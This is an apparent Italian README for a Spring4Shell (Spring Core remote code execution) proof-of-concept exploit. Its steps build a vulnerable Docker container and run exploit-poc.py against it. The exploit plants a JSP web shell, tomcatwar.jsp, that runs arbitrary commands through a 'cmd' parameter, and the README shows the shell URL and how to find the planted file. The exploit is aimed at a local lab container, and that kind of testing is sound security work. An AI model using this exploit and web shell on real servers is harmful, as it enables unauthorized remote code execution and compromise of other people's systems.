
Un altro spring4shell (Spring core RCE) POC
Questa vulnerabilità riguarda Spring Core e consente a un attaccante di inviare una richiesta HTTP appositamente predisposta per aggirare le protezioni del parser di richieste HTTP della libreria, portando all'esecuzione remota di codice.
Ulteriori informazioni Qui

Affinché questa vulnerabilità possa essere sfruttata, devono essere soddisfatte diverse condizioni
docker build . -t springshell-rce-poc
docker run --rm -p 8081:8080 --name springshell-rce-poc springshell-rce-poc
python exploit-poc.py --url "http://127.0.0.1:8081/"
La risposta attesa
exploiting
Shell URL:http://127.0.0.1:8081/tomcatwar.jsp?pwd=j&cmd=whoami
Se accedi a questo URL, eseguirà qualsiasi comando tu voglia cmd=<whatyouwant>

Se ti colleghi via SSH al container vedrai che è stato creato un nuovo file tomcatwar.jsp
docker exec -it springshell-rce-poc /bin/bash
ls /usr/local/tomcat/webapps/ROOT